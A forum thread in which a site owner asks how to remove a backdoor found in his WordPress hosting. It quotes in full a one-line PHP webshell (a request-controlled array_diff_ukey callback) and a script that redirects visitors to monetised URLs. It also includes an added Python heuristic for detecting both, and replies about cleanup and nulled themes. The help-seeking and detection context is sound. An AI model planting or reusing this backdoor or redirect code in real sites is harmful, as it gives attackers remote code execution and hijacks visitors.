
Need Help, Backdoor in hosting...

Discussion in 'BlackHat Lounge' started by Mike420, Feb 10, 2015.

  1. Mike420

    Hi,

    Today I looked at one hosting and found some really fucked up code in some new files.

    Someone is trying to make money from my new WordPress site without any visitors :D

    Did a little search and found that it's a backdoor.

    But didn't find info on how to remove this shit, there must be some more files...

    Any help welcome...

    cofnig.php
    PHP:
    <?php @array_diff_ukey(@array((string)$_REQUEST['password']=>1),@array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); ?>
    were.php - his money making links.....
    PHP:
    <?php
    // strpos() returns the offset of "Android" in the User-Agent, or false if absent
    $android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
    $android_urls = array (
        'http://com-gem.net/rmpm.php?a=298712&c=wl_con&s=09AND',
        'http://com-d5k.net/uzc.php?a=298712&c=wl_con&s=09AND',
        'http://com-2a4.net/ttb.php?a=298712&c=wl_con&s=09AND',
    );
    $not_android_urls = array (
        'http://com-gem.net/htbtp.php?a=314759&c=wl_con&s=09NR',
        'http://com-d5k.net/adde.php?a=314759&c=wl_con&s=09NR',
        'http://com-2a4.net/amz.php?a=314759&c=wl_con&s=09NR',
    );

    // Default: pick a random URL from the non-Android list
    $n = mt_rand(0,count($not_android_urls)-1);
    $rand_url=$not_android_urls[$n];

    // Android visitors get a random URL from the Android list instead
    if ($android == true)
    {
        $n = mt_rand(0,count($android_urls)-1);
        $rand_url=$android_urls[$n];
    }
    ?>
     <meta http-equiv="refresh" content="2; url=<?php echo $rand_url;?> ">
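
A scanner heuristic for the two files quoted in the post above, as an added example that is not part of the thread: it flags PHP calls whose callback argument comes straight from request input (the pattern in cofnig.php) and meta refreshes whose target is emitted by PHP (the pattern in were.php). The function list, the finding labels and the BENIGN sample are assumptions made for illustration.

```python
import re

# Callable-argument index per PHP callback function (-1 = last); heuristic, not exhaustive.
CALLBACK_ARG = {
    "call_user_func": 0, "call_user_func_array": 0, "array_map": 0, "array_filter": 1,
    "array_walk": 1, "usort": 1, "uasort": 1, "uksort": 1, "array_diff_ukey": -1,
    "array_diff_uassoc": -1, "array_intersect_ukey": -1, "array_udiff": -1}
CALL = re.compile(r"\b(" + "|".join(CALLBACK_ARG) + r")\s*\(", re.I)
SUPERGLOBAL = re.compile(r"\$_(REQUEST|GET|POST|COOKIE)\b")
META_REFRESH = re.compile(r"<meta[^>]+http-equiv=[\"']?refresh[^>]*<\?(php|=)", re.I)

def split_args(src, start):
    """Top-level arguments of the call whose '(' sits just before src[start]."""
    args, cur, depth, quote = [], [], 0, None
    for i in range(start, len(src)):
        ch = src[i]
        if quote:
            if ch == quote and src[i - 1] != "\\":
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch in "([":
            depth += 1
        elif ch in ")]" and depth:
            depth -= 1
        elif ch == ")" or (ch == "," and depth == 0):
            args.append("".join(cur))
            if ch == ")":
                return args
            cur = []
            continue
        cur.append(ch)
    return []  # unbalanced call: not analysable

def scan(src):
    """Return sorted finding labels for one PHP source string."""
    found = set()
    for m in CALL.finditer(src):
        name, args = m.group(1).lower(), split_args(src, m.end())
        idx = CALLBACK_ARG[name]
        if -len(args) <= idx < len(args) and SUPERGLOBAL.search(args[idx]):
            found.add("request-controlled callback: " + name)
    if META_REFRESH.search(src):
        found.add("meta refresh to PHP-generated URL")
    return sorted(found)

# Sample inputs: the first two reuse lines quoted in the post, the third is a constructed benign file.
BACKDOOR = "<?php @array_diff_ukey(@array((string)$_REQUEST['password']=>1),@array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); ?>"
REDIRECT = '<meta http-equiv="refresh" content="2; url=<?php echo $rand_url;?> ">'
BENIGN = "<?php usort($items, 'cmp'); $tags = array_map('trim', $_POST['tags']); ?>"
```

Run scan() over the contents of each .php file in the web root. Checking the callback position, rather than any use of request input, keeps ordinary calls such as the array_map() in BENIGN from being flagged.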
     
  2. phirex

    Download a security plugin that will search for malware.
    Or maybe just purchase the theme instead of downloading nulled ones.
     
  3. Conor

    This plugin has worked well for me in the past:
    https://wordpress.org/plugins/gotmls/

    The easier way is to back up your content, and just redo the site from scratch with new passwords.
     
  4. Mike420

    Thanks.

    This plugin won't find anything.

    The thing is I have many domains and all of them have this shit..

    I need to change root, mysql, ftp, wp passwords?

    And if there is still some file hidden I guess there is no point in changing passwords.
     
  5. Mike420

    Got it right, my hosting made some exploit scan and removed this shit.

    Stay away from nulled themes, virus and exploit scanners can't always find these things.
     
  6. prospect7

    Fiverr has guys that will do a security audit on your server plus remove the malicious scripts for you.